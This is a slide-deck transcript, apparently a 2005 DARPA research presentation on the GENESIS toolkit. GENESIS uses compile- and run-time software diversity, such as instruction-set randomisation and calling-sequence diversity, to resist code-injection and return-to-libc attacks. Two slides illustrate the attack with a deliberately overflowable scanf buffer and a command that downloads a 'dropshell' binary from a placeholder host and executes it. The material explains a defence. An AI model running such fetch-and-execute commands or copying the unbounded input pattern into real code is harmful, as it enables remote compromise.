Published by Julian Hensley. Modified over 9 years ago.
1
GENESIS: A Framework For Achieving Component Diversity
John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong (University of Virginia)
Chenxi Wang (Carnegie Mellon University)
2
University of Virginia www.cs.virginia.edu/genesis DARPA SRS July 2005 PI Meeting
Project Overview
- Existing practice: Monoculture
- Technical objectives: Exploit artificial diversity to break existing software monoculture
- Technical approach:
  - Artificial diversity at compile, link, load, and execution times
  - Combinations selectable with toolkit
3
Project Overview
- Major risks and planned mitigation:
  - Susceptibility to new class of attacks
  - Deployment issues
  - Ad hoc evaluation
- Quantitative metrics: Fraction of variants that remain susceptible to attack after transformation
- Expected major achievements: Significant reduction in susceptibility
- Task milestones (schedule 12/31/05):
  - Complete diversity toolkit
  - Evaluate complete spectrum of diversity techniques
4
Genesis Diversity Toolkit
5
Genesis Diversity Generator
7
Strong ISR using AES and IT
- Randomized Instruction Set Emulation, E. G. Barrantes, D. H. Ackley, S. Forrest, and D. Stefanović, ACM Transactions on Information System Security, 8(1), pp. 3-40.
- Current implementations of ISR execute injected code
- Random instruction sequences are executed
- Rely on probabilistic arguments that the random sequences will crash harmlessly
- Not realistic for critical embedded systems
- Recovery of application is difficult/impossible
- Vulnerable to attack
- Where's the FEEB?, Ana Sovarel and Dave Evans, USENIX Security Conference, August 2005.
- Overhead issues (both space and time)
8
Strong ISR using AES and IT
9
Strong ISR using AES and IT
10
CSD: Calling sequence diversity
- Compile-time/runtime technique to create a software population with many different calling sequences
- Effective defense against "return-to-libc" attacks (also known as arc injection, Pincus and Baker, IEEE Security and Privacy, 2(4), pp. 20-27)
- Return-to-libc does not require injecting code into the application
- ISR is not an effective defense against return-to-libc type attacks
11
Return-to-libc attack

    void bar(int arg1, int arg2) {
        char buffer[100];
        …
        scanf("%s", buffer);
        …
    }

    Runtime Stack      Runtime Stack (Buffer Overflow)
    …                  …
    arg2               arg2
    arg1               Bad arg
    return addr        system
    Saved ebp          Saved ebp
    buffer             buffer

    wget http://www.example.com/dropshell ; chmod +x dropshell ; ./dropshell
12
CSD: Calling sequence diversity

    void bar() {
        …
        key=Keygen(key, &bar, &foo);
        foo(arg1, arg2);
        key=Keygen(key, &foo, &bar);
        …
        key=Keygen(key, &bar, &baz);
        baz(arg);
        key=Keygen(key, &baz, &bar);
        …
    }

    void foo(int a1, int a2) {
        Keycheck(key);
        …
        Keycheck(key);
    }
13
CSD: Calling sequence diversity
- Calls to Keygen and Keycheck routines are inserted by the compiler front end (lcc, edg, Phoenix)
- At runtime:
  - Strata generates a key for each function (stored in protected region)
  - Replaces calls with inline code to generate proper key or check that the key has the proper value
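An added example, not code from the Genesis project: a minimal C model of the Keygen/Keycheck idea from slides 12 and 13, showing that a callee reached without the inserted Keygen fails its check. The XOR key transform, the rand()-based key setup, the extra function-id argument to Keycheck and the names call_instrumented/call_uninstrumented are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

enum { FN_BAR, FN_FOO, FN_COUNT };

static uint32_t fn_key[FN_COUNT]; /* per-function keys (slides: kept in a protected region) */
static uint32_t key;              /* running key carried across call edges */

/* Assumed key setup: rand() is a stand-in for an unpredictable source. */
static void csd_init(unsigned seed) {
    srand(seed);
    for (int i = 0; i < FN_COUNT; i++)   /* low byte keeps the keys distinct */
        fn_key[i] = ((uint32_t)rand() << 8) | (uint32_t)(i + 1);
    key = fn_key[FN_BAR];                /* execution starts inside bar */
}

/* Assumed transform: swap the caller's key for the callee's on a legitimate edge. */
static uint32_t Keygen(uint32_t k, int from, int to) {
    return k ^ fn_key[from] ^ fn_key[to];
}

/* Returns 1 only if k is the key of fn; fn models the per-function inlined check. */
static int Keycheck(uint32_t k, int fn) { return k == fn_key[fn]; }

static int foo(int a1, int a2) {
    if (!Keycheck(key, FN_FOO)) return -1;  /* real instrumentation would abort here */
    int sum = a1 + a2;
    if (!Keycheck(key, FN_FOO)) return -1;  /* exit check, as on the slide */
    return sum;
}

/* Instrumented call edge bar -> foo -> bar. */
int call_instrumented(unsigned seed) {
    csd_init(seed);
    key = Keygen(key, FN_BAR, FN_FOO);
    int r = foo(2, 3);
    key = Keygen(key, FN_FOO, FN_BAR);
    return Keycheck(key, FN_BAR) ? r : -1;
}

/* Control reaches foo without passing through the inserted Keygen. */
int call_uninstrumented(unsigned seed) {
    csd_init(seed);
    return foo(2, 3);
}

int main(void) {
    printf("instrumented edge:   %d\n", call_instrumented(2005));
    printf("uninstrumented edge: %d\n", call_uninstrumented(2005));
    return 0;
}
```

In this model the protection rests entirely on the per-function keys staying secret and unpredictable, which is why the slides place them in a protected region.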
14
Return-to-libc attack

    void bad(int arg1, int arg2) {
        char buffer[100];
        …
        scanf("%s", buffer);
        …
    }

    Runtime Stack      Runtime Stack (Buffer Overflow)
    …                  …
    arg2               arg2
    arg1               Bad arg
    return addr        system
    Saved ebp          Saved ebp
    buffer             buffer

    wget http://www.example.com/dropshell ; chmod +x dropshell ; ./dropshell
15
Genesis Diversity Toolkit
16
Toolkit Execution Environment
18
Performance
19
Progress Towards Metric
- Diversity toolkit facilitates:
  - Creation of large number of variants
  - Operating, attacking & monitoring variants
- Large numbers of variants of Apache created and tested, success rate very high
- Disclaimers:
  - Only one application
  - Synthetic but realistic vulnerabilities
  - No statistical significance
20
Impediments To Success
- Possibly unacceptable execution performance degradation
- Unknown security performance against other types of vulnerabilities
- Need to investigate the spectrum of diversity defense techniques
- Cost of deployment and maintenance of the variants might be high